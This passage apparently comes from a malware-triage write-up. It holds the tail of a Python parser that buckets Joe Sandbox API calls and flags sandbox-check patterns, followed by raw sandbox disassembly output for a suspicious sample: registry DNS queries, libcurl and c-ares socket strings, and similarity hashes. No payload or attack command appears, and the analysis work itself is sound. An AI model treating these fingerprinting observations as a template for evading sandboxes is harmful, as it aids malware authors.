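# "• String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv"
STRING_ID_LINE = re.compile(r"^\s*[•*-]?\s*String ID:\s*(?P<ids>.*)$")

# Behaviour buckets: a hand-made mapping (assumption), not Joe Sandbox output.
BUCKETS = {
    "host fingerprinting": {"GetSystemInfo", "GlobalMemoryStatusEx",
                            "GetLogicalDrives", "GetDriveTypeA", "GetDiskFreeSpaceExA"},
    "file enumeration": {"FindFirstFileA", "FindFirstFileW", "FindNextFileW"},
    "process enumeration": {"Process32NextW", "QueryFullProcessImageNameA"},
    "registry": {"RegOpenKeyExA", "RegQueryValueExA", "RegEnumKeyExA", "RegCloseKey"},
    "winsock": {"socket", "connect", "recv", "select", "setsockopt", "ioctlsocket",
                "getsockname", "closesocket", "WSAGetLastError",
                "WSAEventSelect", "WSAEnumNetworkEvents"},
}

# Debug strings that identify an embedded library build. Assumption: the first
# two are the exact format strings of libcurl's lib/memdebug.c (CURLDEBUG
# builds only); "multi.c" is a libcurl source-file name.
LIBRARY_MARKERS = {
    "libcurl memdebug (CURLDEBUG build)": ("reached memlimit",
                                           "RECV %s:%d recv(%lu) = %ld"),
    "libcurl source-file name": ("multi.c",),
}


def parse_report(text):
    """Return (apis, strings): API dicts (name, module, args, ref) and String IDs."""
    apis, strings = [], []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["ref"] = int(entry["ref"], 16)
            apis.append(entry)
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            # Joe Sandbox joins one function's strings with '$', so a literal
            # '$' inside a string is ambiguous and gets split as well.
            strings.extend(s for s in m.group("ids").split("$") if s)
    return apis, strings


def bucket_apis(apis):
    """Map each behaviour bucket to the sorted list of API names seen in it."""
    seen = defaultdict(set)
    known = set().union(*BUCKETS.values())
    for entry in apis:
        name = entry["name"]
        for bucket, names in BUCKETS.items():
            if name in names:
                seen[bucket].add(name)
        if name not in known:
            seen["unclassified"].add(name)
    return {bucket: sorted(names) for bucket, names in seen.items()}


def library_markers(strings):
    """Return labels whose marker strings all occur (as substrings) in strings."""
    return [label for label, markers in LIBRARY_MARKERS.items()
            if all(any(marker in s for s in strings) for marker in markers)]


def triage(text):
    """Summarise one or more functions' tables into a triage dict."""
    apis, strings = parse_report(text)
    buckets = bucket_apis(apis)
    return {
        "api_count": len(apis),
        "buckets": buckets,
        "libraries": library_markers(strings),
        # Heuristic (assumption): three or more memory/CPU/disk queries in one
        # function is the usual shape of a resource-based sandbox check.
        "resource_fingerprint": len(buckets.get("host fingerprinting", [])) >= 3,
    }


# Constructed sample: entries copied from the report's tables above.
SAMPLE_REPORT = """\
• GetSystemInfo.KERNELBASE ref: 00E92579
• GlobalMemoryStatusEx.KERNELBASE ref: 00E925CC
• GetDriveTypeA.KERNELBASE ref: 00E92647
• GetDiskFreeSpaceExA.KERNELBASE ref: 00E9267E
• KiUserCallbackDispatcher.NTDLL ref: 00E927E2
• FindFirstFileW.KERNELBASE ref: 00E928F8
• FindNextFileW.KERNELBASE ref: 00E9291F
• WSAEventSelect.WS2_32(?,?,?), ref: 00EA0712
• WSAEventSelect.WS2_32(?,?,00000000), ref: 00EA09DD
• WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00EA09FB
• String ID: N=$multi.c
• String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

Run against the full report text rather than the sample, the same parser also collects the `ref:` addresses per API, which is what you want when mapping a behaviour bucket back to the `Opcode ID` / `Instruction Fuzzy Hash` records for similarity pivots.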

Control-flow Graph (rendered graphic omitted)

Function 00EA6FA0–00EA7346. Recoverable structure from the graph:
• 00EA6FA0–00EA7041: entry and an initial loop (00EA6FD4–00EA6FE9)
• 00EA7050–00EA7174: outer loop containing three similar sub-loops (00EA708B–00EA70D5, 00EA70E1–00EA7125, 00EA712C–00EA716D)
• 00EA71F1–00EA722D: call 00EAD7F0, then select
• 00EA7240–00EA7306: per-entry loop with three __WSAFDIsSet tests (00EA726B, 00EA729A, 00EA72BA), i.e. FD_ISSET on three descriptor sets
• 00EA7324–00EA7330: common exit; 00EA7331–00EA7346: alternative exit
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a244310c90b7df6a64e2d372d9e6380241a24eec01750d8a0f36ee09f8b97aa2
                                                              • Instruction ID: 3ed4ed540105482bd680bfb4dc21a81cae62cd8c20c46dd1d4b691b4756913ff
                                                              • Opcode Fuzzy Hash: a244310c90b7df6a64e2d372d9e6380241a24eec01750d8a0f36ee09f8b97aa2
                                                              • Instruction Fuzzy Hash: 729102302093094BD735CA288CD07BB72D5EFDA368F15AB2CE8D95B1D4EB74AC40D691

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: function starting at f5b180 (graph rendered as an image in the report; the basic-block edge list is omitted here). Named API call in the graph: getsockname; internal calls to f5af30, f5b020, f5b060, f5b590, f5b660, f5b770, f5b870 and 1218b00.
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 00F5B2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 35d30b13f357446202677d2d79789a4905bbb6d659e7e35a94996da8ef37573f
                                                              • Instruction ID: d49d248de7ae8403108498e7503f2db8684e79ec9c7415a90088168cb7b16a2e
                                                              • Opcode Fuzzy Hash: 35d30b13f357446202677d2d79789a4905bbb6d659e7e35a94996da8ef37573f
                                                              • Instruction Fuzzy Hash: B2C18F31A043059FD718DF24C880A6A77E1FF88355F19886CFA459B3A5E734ED49DB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a10f70333d6cc926e739aad54e7f42824baf7df601665c8fdeb7780fa3da2864
                                                              • Instruction ID: 29173175ab4ca2db2b611462963dae2da2d9642d8aef9784affac385857608dc
                                                              • Opcode Fuzzy Hash: a10f70333d6cc926e739aad54e7f42824baf7df601665c8fdeb7780fa3da2864
                                                              • Instruction Fuzzy Hash: 8981F5FB26C321BD720A91815F649FB6B7EE5CB730B32842AF403D6582F3944E499171
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: b7850c1be3679f184428af409f4254bd8ffbffcf722b5e823b3c81ecedbcd94b
                                                              • Instruction ID: 27420ab0ccd1387058f96cfa254f54238aba2c0631a676be7ed9084c761691dd
                                                              • Opcode Fuzzy Hash: b7850c1be3679f184428af409f4254bd8ffbffcf722b5e823b3c81ecedbcd94b
                                                              • Instruction Fuzzy Hash: B731A5B49093059FCB10EFB8C5846AEBBF0BF54308F01896DE898A7354E7349A44CF92
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F4AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F4AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00F4AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F4AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F4AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 00F4AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00F4AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00F4AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00F4AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 00F4AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 00F4ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 00F4AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00F4AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F4AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F4AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F4AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00F4B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: 80e9072b6c6adcbd1ebe95dbbc2c2847754cf59e4991838ffb5e08374e10fc70
                                                              • Instruction ID: a18f7491cfde2c2b5498e1495511d5e356a32d92abdc002926fdfb4c382af549
                                                              • Opcode Fuzzy Hash: 80e9072b6c6adcbd1ebe95dbbc2c2847754cf59e4991838ffb5e08374e10fc70
                                                              • Instruction Fuzzy Hash: FA72A0B1A44301AFE320DB24CC81B6B7BE8AF95710F14492CF985DB2A1E775E944DB63
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00ECA832
                                                              Strings
                                                              • Bind to local port %d failed, trying next, xrefs: 00ECAFE5
                                                              • cf-socket.c, xrefs: 00ECA5CD, 00ECA735
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 00ECAE1F
                                                              • Local port: %hu, xrefs: 00ECAF28
                                                              • @, xrefs: 00ECA8F4
                                                              • Trying [%s]:%d..., xrefs: 00ECA689
                                                              • @, xrefs: 00ECAC42
                                                              • Could not set TCP_NODELAY: %s, xrefs: 00ECA871
                                                              • Trying %s:%d..., xrefs: 00ECA7C2, 00ECA7DE
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00ECAD0A
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 00ECADAC
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 00ECA796
                                                              • bind failed with errno %d: %s, xrefs: 00ECB080
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 00ECAE60
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00ECA6CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: b164f7d9e6304452fe17a34dd44a99805822424680ca335f33f414d5f508b031
                                                              • Instruction ID: 45ebe93394b90f1cd4927139bca04758616e39dc7dc8c738bf336a3f13b1a7ea
                                                              • Opcode Fuzzy Hash: b164f7d9e6304452fe17a34dd44a99805822424680ca335f33f414d5f508b031
                                                              • Instruction Fuzzy Hash: 63622771504345ABE7208F14C946FABB7E4FF8430CF08652DF98967292E772A846CB93

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph: function starting at f59740 (graph rendered as an image in the report; the basic-block edge list is omitted here, and the source listing is cut off at this point). Named API calls in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey; the remaining calls are to internal subroutines.
748->754 755 f59e38-f59e3b 748->755 778 f59c35 752->778 779 f59c66-f59c75 call f578a0 752->779 765 f59e5e-f59e67 754->765 755->754 755->765 794 f59de1-f59dee call f4ec80 757->794 795 f59e23-f59e2c call f4eac0 757->795 758->679 760->713 775 f59d9a-f59db5 call f4e9f0 call f4e4a0 763->775 764->725 765->713 765->745 767->745 773 f5a057-f5a070 call f4ebf0 * 2 768->773 774 f5a04e-f5a051 768->774 777 f59ee5-f59ef2 call f4e9f0 770->777 773->658 774->618 774->773 808 f59d75-f59d82 call f4ec80 775->808 809 f59db7-f59dc0 call f4eac0 775->809 777->604 802 f59ef8-f59f0e call f4e440 777->802 786 f59c37-f59c51 call f4e9f0 778->786 798 f5a011 779->798 799 f59c7b-f59c8f call f4e7c0 779->799 786->662 824 f59c57-f59c64 call f4e9d0 786->824 818 f59df1-f59e04 call f4e960 794->818 795->818 798->666 799->662 819 f59c95-f5a00e 799->819 822 f59f10-f59f26 call f4e3c0 802->822 823 f59ed2-f59edf call f4e9e0 802->823 829 f59d85-f59d98 call f4e960 808->829 809->829 818->748 818->757 819->798 822->823 838 f59f28 822->838 823->604 823->777 824->779 824->786 829->764 829->775 838->618
APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F59946
• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00F59974
• RegCloseKey.KERNELBASE(?), ref: 00F5998B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
• Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
• API String ID: 3677997916-4129964100
• Opcode ID: 0fff23b801c2ed85865db9118d02de67bc73d90fa7cbe220da645995e15ead0c
• Instruction ID: a3f5fff8c5c7703d1a0a551238b011a933b4a5c246f9020de757ef4f9bbfbf58
• Opcode Fuzzy Hash: 0fff23b801c2ed85865db9118d02de67bc73d90fa7cbe220da645995e15ead0c
• Instruction Fuzzy Hash: 8C3294B5D08201ABEB11AB20EC42B1B7BE4AF54315F084434FE4997262F775E919F7A3

Control-flow Graph
APIs
• connect.WS2_32(?,?,00000001), ref: 00EC8C2F
• SleepEx.KERNELBASE(00000000,00000000), ref: 00EC8CF3
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
Similarity
• API ID: Sleepconnect
• String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
• API String ID: 238548546-879669977
• Opcode ID: 6a0c1ee3b4a31de04c9fd0003a03145e997b87c69dff00fb9fe8d58e9e7cd813
• Instruction ID: 2be116ce8952171053bc31e6dd6dc7d7a1e9646cb8b2da9b7c0ba61c50361d0d
• Opcode Fuzzy Hash: 6a0c1ee3b4a31de04c9fd0003a03145e997b87c69dff00fb9fe8d58e9e7cd813
• Instruction Fuzzy Hash: 5DB1E574604305AFD710CF24CB85FA6BBE4AF45318F04962DE85A6B2D2DB72EC46C762

Control-flow Graph
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
Similarity
• API ID: EnumOpen
• String ID: d
• API String ID: 3231578192-2564639436
• Opcode ID: ca810003a93820ffbb870b57acc7c3f858f88404431ee0165ab5aaa2c754b25c
• Instruction ID: 3e62159a79bd7bedcaf49e85ae949f072a187b66777f604389c2e4cd3d40eba1
• Opcode Fuzzy Hash: ca810003a93820ffbb870b57acc7c3f858f88404431ee0165ab5aaa2c754b25c
• Instruction Fuzzy Hash: 0271D4B490431A9FDB50DF69C58479EBBF0BF84308F11886DE898A7351D7749A88CF92

Control-flow Graph
APIs
• send.WS2_32(multi.c,?,?,?,N=,00000000,?,?,00EA07BF), ref: 00E976EB
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
Similarity
• API ID: send
• String ID: LIMIT %s:%d %s reached memlimit$N=$SEND %s:%d send(%lu) = %ld$multi.c$send
• API String ID: 2809346765-2907172669
• Opcode ID: daa6984b7112ced0268c7a17cb20c9c8eb41c20533a42ce1da0407bcee0f1fc5
• Instruction ID: 2c33e9d71f5f72b2b8ec9ce964e56de7af609397a4334eabd0ccb94dc5002529
• Opcode Fuzzy Hash: daa6984b7112ced0268c7a17cb20c9c8eb41c20533a42ce1da0407bcee0f1fc5
• Instruction Fuzzy Hash: FB115BB5628304BBD631971A9C85D273B9CDF82B78F551929F85937252E1719C0C82F1

Control-flow Graph
APIs
• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00EC935C
• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00EC9389
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
Similarity
• API ID: Ioctlsetsockopt
• String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
• API String ID: 1903391676-2691795271
• Opcode ID: 84adb52420901f65b58ef030b9814d1ad4320eb965dc4d6619734932e0ad7100
• Instruction ID: dfb6b483071974cf09d4c3753fabae880d6dc9157bf295af80ffa7fb1b20dc50
• Opcode Fuzzy Hash: 84adb52420901f65b58ef030b9814d1ad4320eb965dc4d6619734932e0ad7100
• Instruction Fuzzy Hash: B1513530600305ABE714DF28C985FAAB7A5FF88318F14952DFD58AB283E731E952C751

Control-flow Graph
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
